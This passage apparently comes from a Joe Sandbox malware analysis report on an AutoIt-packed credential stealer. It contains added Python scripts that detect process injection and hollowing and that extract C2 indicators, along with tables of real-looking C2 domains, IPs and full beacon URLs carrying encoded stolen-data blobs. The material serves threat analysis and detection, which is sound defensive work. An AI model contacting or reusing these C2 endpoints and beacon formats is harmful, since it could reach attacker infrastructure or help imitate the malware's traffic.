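            m = re.match(r"(.+?)\s+base:\s*(\d+)$", rest)
            if m and image_name(m[1]) != src:
                f["injection"].append((src, image_name(m[1]), "memory written at base %d" % int(m[2])))
        elif kind == "Thread APC queued":
            m = re.match(r"target process:\s*(.+)$", rest)
            if m and image_name(m[1]) != src:
                f["injection"].append((src, image_name(m[1]), "APC queued"))
        elif kind == "Process created":
            # Image on disk vs. image named on the command line: a mismatch is the
            # hollowing tell (svchost.exe started with 1001-13.exe's command line).
            m = re.match(r'(.+?)\s+"([^"]+)"', rest)
            if m and image_name(m[1]) != image_name(m[2]):
                f["hollowing"].append((src, image_name(m[1]), image_name(m[2])))
        elif kind == "File opened":
            low = rest.lower()
            if any(r in low for r in BROWSER_ROOTS) and image_name(rest) in BROWSER_STORES and src not in STORE_OWNERS:
                f["credential_access"].append((src, rest))
        elif kind == "Key opened":
            if MAIL_PROFILE_KEY in rest.lower() and src not in MAIL_OWNERS:
                f["credential_access"].append((src, rest))
    return f


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LINES).items():
        print(key)
        for item in (value.items() if isinstance(value, Counter) else value):
            print("   ", item)
```

Run against the twelve sample lines it reports five injection edges (three section mappings, one remote write, one APC), one hollowed process (svchost.exe carrying 1001-13.exe's command line; the firefox.exe launch passes because image and command line agree), three credential-store touches, all by chkntfs.exe, and two direct Nt* calls from OlGIUOYUZW.exe. The same parser runs over the full signature dump of any Joe Sandbox report exported as text.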

                Remote Access Functionality

                Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000007.00000002.3995040974.0000000004620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.2629802419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.2630146597.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.2630585568.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.3994023782.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.3993353772.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.3995415844.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\1001-13.exe; Code function: 0_2_00EB1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\1001-13.exe; Code function: 0_2_00EB1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                MITRE ATT&CK Matrix (per tactic; the number in parentheses is the count of signatures mapped to that technique, unnumbered cells are the matrix's remaining techniques with no matching signature)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
                Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (12); Access Token Manipulation (21); Process Injection (412)
                Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (341); Virtualization/Sandbox Evasion (12); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph ID: 1589871; Sample: 1001-13.exe; Startdate: 13/01/2025; Architecture: WINDOWS; Score: 100
                (bracketed numbers after a process are the graph's created-files / registry-values count badges, see legend)

                Sample-level signatures: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 4 other signatures
                Contacted at sample level: www.laduta.xyz; www.explorevision.xyz (Performs DNS queries to domains with low reputation); 9 other IPs or domains

                1001-13.exe [1] (started)
                    Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 3 other signatures
                    -> svchost.exe (started)
                        Maps a DLL or memory area into another process
                        -> OlGIUOYUZW.exe (injected)
                            Found direct / indirect Syscall (likely to bypass EDR)
                            -> chkntfs.exe [13] (started)
                                Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                                -> OlGIUOYUZW.exe (injected)
                                    Found direct / indirect Syscall (likely to bypass EDR)
                                    Network: www.ripbgs.info 47.83.1.90 (ports 49997, 49998, 49999; VODANET International IP-Backbone of Vodafone DE; United States); www.babyzhibo.net 192.186.58.31 (ports 50006, 50007, 50008; PING-GLOBAL-AS Ping Global Amsterdam POP ASN NL; United States); 6 other IPs or domains
                                -> firefox.exe (started)

                Source | Detection | Scanner | Label
                1001-13.exe | 61% | Virustotal |
                1001-13.exe | 68% | ReversingLabs | Win32.Worm.DorkBot
                1001-13.exe | 100% | Avira | DR/AutoIt.Gen8
                1001-13.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://www.einpisalpace.shop/pgw3/ | 0% | Avira URL Cloud | safe
                http://www.jiuyuezhibo.net | 0% | Avira URL Cloud | safe
                http://www.oshwal.net | 0% | Avira URL Cloud | safe
                http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.png | 0% | Avira URL Cloud | safe
                http://www.mzkd6gp5.top/utww/ | 0% | Avira URL Cloud | safe
                http://www.zhonglangzhibo.net | 0% | Avira URL Cloud | safe
                http://www.liufangzhibo.com | 0% | Avira URL Cloud | safe
                http://www.maituzhibo.com | 0% | Avira URL Cloud | safe
                http://www.qimiaozhibo.com | 0% | Avira URL Cloud | safe
                http://www.liuhuazhibo.net | 0% | Avira URL Cloud | safe
                http://www.elecsa.net | 0% | Avira URL Cloud | safe
                http://einpisalpace.shop/ | 0% | Avira URL Cloud | safe
                https://laduta.xyz/d89m?CviT=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl | 0% | Avira URL Cloud | safe
                http://www.lovemarketing.net | 0% | Avira URL Cloud | safe
                http://www.maskmakers.net | 0% | Avira URL Cloud | safe
                http://www.yundouzhibo.net | 0% | Avira URL Cloud | safe
                http://www.xiaomiaozhibo.net | 0% | Avira URL Cloud | safe
                http://www.medicalink.net | 0% | Avira URL Cloud | safe
                http://www.banditi.net | 0% | Avira URL Cloud | safe
                http://www.wuyezhibo.com | 0% | Avira URL Cloud | safe
                http://www.eventsmedia.net | 0% | Avira URL Cloud | safe
                http://www.68markavenue.net | 0% | Avira URL Cloud | safe
                http://www.hairdeluxe.net | 0% | Avira URL Cloud | safe
                https://white.anva.org.cn/ | 0% | Avira URL Cloud | safe
                http://www.agrobazar.net | 0% | Avira URL Cloud | safe
                http://www.legalvideos.net | 0% | Avira URL Cloud | safe
                http://www.laduta.xyz/d89m/?CviT=wOJtjxBUJG0NHp56IJ7sd/1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F/TSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws=&YFCLW=BxgTctSh | 0% | Avira URL Cloud | safe
                http://www.nuoyunzhibo.com | 0% | Avira URL Cloud | safe
                http://www.welovebeauty.net | 0% | Avira URL Cloud | safe
                http://www.xunaizhibo.com/binding | 0% | Avira URL Cloud | safe
                http://www.babyzhibo.net/wn9b/ | 0% | Avira URL Cloud | safe
                https://zzlz.gsxt.gov.cn/ | 0% | Avira URL Cloud | safe
                http://www.perfectpint.net | 0% | Avira URL Cloud | safe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.js | 0% | Avira URL Cloud | safe
                http://www.huayuzhibo.net | 0% | Avira URL Cloud | safe
                http://www.theflowerpot.net | 0% | Avira URL Cloud | safe
                http://www.wuyezhibo.net | 0% | Avira URL Cloud | safe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.js | 0% | Avira URL Cloud | safe
                http://www.legalstrategy.net | 0% | Avira URL Cloud | safe
                http://www.chuncaozhibo.net | 0% | Avira URL Cloud | safe
                http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.png | 0% | Avira URL Cloud | safe
                http://www.rsbi.net | 0% | Avira URL Cloud | safe
                http://www.implantcentre.net | 0% | Avira URL Cloud | safe
                http://www.xingyuanzhibo.net | 0% | Avira URL Cloud | safe
                http://www.easygram.net | 0% | Avira URL Cloud | safe
                http://www.liangmeizhibo.net | 0% | Avira URL Cloud | safe
                http://www.qinglizhibo.net | 0% | Avira URL Cloud | safe
                http://www.kx22368.shop/ca6n/?YFCLW=BxgTctSh&CviT=0h9Wf4Uk+EHtRoE9GYslXHc8OAVXToPYP42Hdey84aKhqV9wbfXJif0/+OnZ2BVp9cN120ZusPNi0A+xg/3t9NEZmf+IGJW1PRZ6E2m6SBA4aflrt404XQhuINrHqXgvx4ee6EU= | 0% | Avira URL Cloud | safe
                http://www.mynewshub.net | 0% | Avira URL Cloud | safe
                http://www.yanyuzhibo.com | 0% | Avira URL Cloud | safe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/index.umd.js | 0% | Avira URL Cloud | safe
                http://www.lovevintage.net | 0% | Avira URL Cloud | safe
                http://www.startuptalent.net | 0% | Avira URL Cloud | safe
                http://www.gotogermany.net | 0% | Avira URL Cloud | safe
                http://www.babyzhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d40f1d | 0% | Avira URL Cloud | safe
                http://www.hiload.net | 0% | Avira URL Cloud | safe
                http://www.biomedika.net | 0% | Avira URL Cloud | safe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.js | 0% | Avira URL Cloud | safe
                http://www.babyzhibo.net/template/news/wandoujia/static/picture/anva-zilv.png | 0% | Avira URL Cloud | safe
                http://www.happystories.net | 0% | Avira URL Cloud | safe
                http://www.luxbrand.net | 0% | Avira URL Cloud | safe
                http://www.athousandwords.net | 0% | Avira URL Cloud | safe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/replyItem.fe363a40.js | 0% | Avira URL Cloud | safe
                http://www.yanyangzhibo.com | 0% | Avira URL Cloud | safe
                http://www.bodyonline.net | 0% | Avira URL Cloud | safe
                http://www.losbravos.net | 0% | Avira URL Cloud | safe
                http://www.babyzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3deb | 0% | Avira URL Cloud | safe
                http://www.einpisalpace.shop/pgw3/?YFCLW=BxgTctSh&CviT=giVj5h0GrIkb2nAntMgQgIHhz9vsvZP6QDamwOszT0WhTX9+0mDl7NHSkZ+hOyPxCf2Vu3CaIskW8RrY03yQo2eiaMWSi+vSOZimmmNTE2YBudIqT+28rai5l9Ujnr5BEbYzzwU= | 0% | Avira URL Cloud | safe
                http://www.allprinting.net | 0% | Avira URL Cloud | safe
                http://www.megaos.net | 0% | Avira URL Cloud | safe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/js.js | 0% | Avira URL Cloud | safe
                http://www.methlab.net | 0% | Avira URL Cloud | safe
                http://www.qiyuezhibo.net | 0% | Avira URL Cloud | safe
                http://www.huoyazhibo.net | 0% | Avira URL Cloud | safe
                http://www.miaozhaozhibo.net | 0% | Avira URL Cloud | safe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/bl.js | 0% | Avira URL Cloud | safe
                http://www.naikuaizhibo.com | 0% | Avira URL Cloud | safe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/header.fe363a40.js | 0% | Avira URL Cloud | safe
                http://www.electrocat.net | 0% | Avira URL Cloud | safe
                http://www.implantcentre.net/binding0%Avira URL Cloudsafe
                http://www.qilinzhibo.net0%Avira URL Cloudsafe
                http://www.liguizhibo.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/wn9b/?CviT=vboslbB2+fPQbuQgZEku0U8Mit34kv6hkjEO/9jYS6JieTwBpMMlA1+GJuZnlONOskCea7euAeJ8nc5JKxSpmkXrUEu+S/eo/p+L/n9ML9zYgduzowjOe25j+nYWtjJhKH1IZis=&YFCLW=BxgTctSh0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/picture/default_avatar.jpg0%Avira URL Cloudsafe
                http://www.anmozhibo.net0%Avira URL Cloudsafe
                http://www.mzkd6gp5.top/utww/?YFCLW=BxgTctSh&CviT=tlTwcU9ZWjUkkDOfL8m8hKdUQz2PcyBI6lKxmlk4uDhIu7zh7TbGiDYhoS5CKbA93kURRma0w2BXBhIfz9bvypQbFpT5jG8x4isXk855maVsJaNYXMtMyHgYaLu1BwVeMhPbSn8=0%Avira URL Cloudsafe
                http://www.mzkd6gp5.top0%Avira URL Cloudsafe
                http://www.aguardiente.net0%Avira URL Cloudsafe
                http://www.eurosupport.net0%Avira URL Cloudsafe
                http://www.xiapizhibo.net0%Avira URL Cloudsafe
                http://www.babyzhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.js0%Avira URL Cloudsafe
                http://www.aicaozhibo.net0%Avira URL Cloudsafe
                http://www.kleenair.net0%Avira URL Cloudsafe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.laduta.xyz | 192.64.119.109 | true | true | | unknown
www.babyzhibo.net | 192.186.58.31 | true | true | | unknown
www.potorooqr.lol | 127.0.0.1 | true | false | | unknown
url.gname.net | 172.65.235.97 | true | false | | high
www.einpisalpace.shop | 188.114.96.3 | true | false | | high
www.explorevision.xyz | 162.0.236.169 | true | true | | unknown
www.mzkd6gp5.top | 104.21.16.1 | true | true | | unknown
www.ripbgs.info | 47.83.1.90 | true | true | | unknown
www.0303588a47.buzz | unknown | unknown | false | | unknown
www.kx22368.shop | unknown | unknown | false | | unknown
www.tizzles.tech | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.mzkd6gp5.top/utww/ | true | Avira URL Cloud: safe | unknown
http://www.einpisalpace.shop/pgw3/ | true | Avira URL Cloud: safe | unknown
http://www.laduta.xyz/d89m/?CviT=wOJtjxBUJG0NHp56IJ7sd/1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F/TSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws=&YFCLW=BxgTctSh | true | Avira URL Cloud: safe | unknown
http://www.babyzhibo.net/wn9b/ | true | Avira URL Cloud: safe | unknown
http://www.kx22368.shop/ca6n/?YFCLW=BxgTctSh&CviT=0h9Wf4Uk+EHtRoE9GYslXHc8OAVXToPYP42Hdey84aKhqV9wbfXJif0/+OnZ2BVp9cN120ZusPNi0A+xg/3t9NEZmf+IGJW1PRZ6E2m6SBA4aflrt404XQhuINrHqXgvx4ee6EU= | true | Avira URL Cloud: safe | unknown
http://www.einpisalpace.shop/pgw3/?YFCLW=BxgTctSh&CviT=giVj5h0GrIkb2nAntMgQgIHhz9vsvZP6QDamwOszT0WhTX9+0mDl7NHSkZ+hOyPxCf2Vu3CaIskW8RrY03yQo2eiaMWSi+vSOZimmmNTE2YBudIqT+28rai5l9Ujnr5BEbYzzwU= | true | Avira URL Cloud: safe | unknown
http://www.babyzhibo.net/wn9b/?CviT=vboslbB2+fPQbuQgZEku0U8Mit34kv6hkjEO/9jYS6JieTwBpMMlA1+GJuZnlONOskCea7euAeJ8nc5JKxSpmkXrUEu+S/eo/p+L/n9ML9zYgduzowjOe25j+nYWtjJhKH1IZis=&YFCLW=BxgTctSh | true | Avira URL Cloud: safe | unknown
http://www.mzkd6gp5.top/utww/?YFCLW=BxgTctSh&CviT=tlTwcU9ZWjUkkDOfL8m8hKdUQz2PcyBI6lKxmlk4uDhIu7zh7TbGiDYhoS5CKbA93kURRma0w2BXBhIfz9bvypQbFpT5jG8x4isXk855maVsJaNYXMtMyHgYaLu1BwVeMhPbSn8= | true | Avira URL Cloud: safe | unknown
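The rows the sandbox marks Malicious = true are the beacons worth turning into indicators, and every one of them is rated "safe" by Avira URL Cloud, so a URL-reputation feed on its own would not have flagged this traffic; the indicators have to come from the behavioural verdict. The Python below is an added example and is not part of the Joe Sandbox report. It takes those rows (copied verbatim into a constructed list), reduces them to the host/path pairs that stay constant across beacons, finds the query parameter whose value is identical in every request, and applies a request-shape heuristic derived only from these rows. The heuristic and its thresholds (a four-character single path segment, exactly two parameters, a blob of at least 64 base64 characters) are assumptions of the example, not documented FormBook behaviour.

```python
"""Extract reusable C2 indicators from the malicious URL rows of the report above.

Added example, not part of the Joe Sandbox report. MALICIOUS_URLS is constructed
from the rows marked Malicious = true; is_c2_shaped() is a heuristic fitted to
those rows, not a FormBook specification.
"""
import re
from urllib.parse import urlsplit

# Constructed input: the eight URLs the report lists with Malicious = true.
MALICIOUS_URLS = [
    "http://www.mzkd6gp5.top/utww/",
    "http://www.einpisalpace.shop/pgw3/",
    "http://www.laduta.xyz/d89m/?CviT=wOJtjxBUJG0NHp56IJ7sd/1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F/TSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws=&YFCLW=BxgTctSh",
    "http://www.babyzhibo.net/wn9b/",
    "http://www.kx22368.shop/ca6n/?YFCLW=BxgTctSh&CviT=0h9Wf4Uk+EHtRoE9GYslXHc8OAVXToPYP42Hdey84aKhqV9wbfXJif0/+OnZ2BVp9cN120ZusPNi0A+xg/3t9NEZmf+IGJW1PRZ6E2m6SBA4aflrt404XQhuINrHqXgvx4ee6EU=",
    "http://www.einpisalpace.shop/pgw3/?YFCLW=BxgTctSh&CviT=giVj5h0GrIkb2nAntMgQgIHhz9vsvZP6QDamwOszT0WhTX9+0mDl7NHSkZ+hOyPxCf2Vu3CaIskW8RrY03yQo2eiaMWSi+vSOZimmmNTE2YBudIqT+28rai5l9Ujnr5BEbYzzwU=",
    "http://www.babyzhibo.net/wn9b/?CviT=vboslbB2+fPQbuQgZEku0U8Mit34kv6hkjEO/9jYS6JieTwBpMMlA1+GJuZnlONOskCea7euAeJ8nc5JKxSpmkXrUEu+S/eo/p+L/n9ML9zYgduzowjOe25j+nYWtjJhKH1IZis=&YFCLW=BxgTctSh",
    "http://www.mzkd6gp5.top/utww/?YFCLW=BxgTctSh&CviT=tlTwcU9ZWjUkkDOfL8m8hKdUQz2PcyBI6lKxmlk4uDhIu7zh7TbGiDYhoS5CKbA93kURRma0w2BXBhIfz9bvypQbFpT5jG8x4isXk855maVsJaNYXMtMyHgYaLu1BwVeMhPbSn8=",
]

# Unpadded or padded standard base64 alphabet; '+' and '/' appear raw in the rows.
B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def split_query(url):
    """Split the query string by hand. urllib.parse.parse_qs would decode the
    raw '+' inside the blobs into spaces and corrupt the indicator values."""
    query = urlsplit(url).query
    if not query:
        return {}
    return dict(p.split("=", 1) for p in query.split("&") if "=" in p)


def c2_endpoints(urls):
    """Distinct (host, path) pairs: the part of each beacon that does not change
    between requests, hence the indicator to block or alert on."""
    return sorted({(urlsplit(u).hostname, urlsplit(u).path) for u in urls})


def constant_params(urls):
    """Query parameters whose name and value are identical in every URL that
    carries a query. For the rows above that is YFCLW=BxgTctSh on all hosts."""
    seen = [split_query(u) for u in urls if urlsplit(u).query]
    if not seen:
        return {}
    common = set(seen[0].items())
    for params in seen[1:]:
        common &= set(params.items())
    return dict(common)


def is_c2_shaped(url, fixed):
    """Heuristic fitted to the rows above (assumption, not a FormBook spec):
    one four-character path segment, exactly two parameters, one of them the
    fixed token, the other a base64 blob of at least 64 characters."""
    parts = urlsplit(url)
    if not re.fullmatch(r"/[a-z0-9]{4}/", parts.path):
        return False
    params = split_query(url)
    if len(params) != 2:
        return False
    if not all(params.get(k) == v for k, v in fixed.items()):
        return False
    blobs = [v for k, v in params.items() if k not in fixed]
    return len(blobs) == 1 and len(blobs[0]) >= 64 and bool(B64.match(blobs[0]))


if __name__ == "__main__":
    fixed = constant_params(MALICIOUS_URLS)
    print("constant parameter(s):", fixed)
    for host, path in c2_endpoints(MALICIOUS_URLS):
        print(f"block: {host}{path}")
    for u in MALICIOUS_URLS:
        print(is_c2_shaped(u, fixed), u[:60])
```

The bare paths (no query) in the input are deliberately not matched by is_c2_shaped(): they are the report's resolved endpoints, not beacon requests, and a detection keyed on the two-parameter shape plus the constant token avoids firing on the decoy static-asset URLs from the same host listed elsewhere on this page. Run the heuristic against proxy or Suricata HTTP logs as a triage filter, then confirm with the host/path pairs before blocking.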
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.12377.cn/ | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://beian.miit.gov.cn/#/Integrated/index | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.jiuyuezhibo.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.maituzhibo.com | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.png | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://push.zhanzhang.baidu.com/push.js | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://www.oshwal.net | OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.zhonglangzhibo.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.liuhuazhibo.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.liufangzhibo.com | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.qimiaozhibo.com | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.elecsa.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.medicalink.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lovemarketing.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.yundouzhibo.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.maskmakers.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
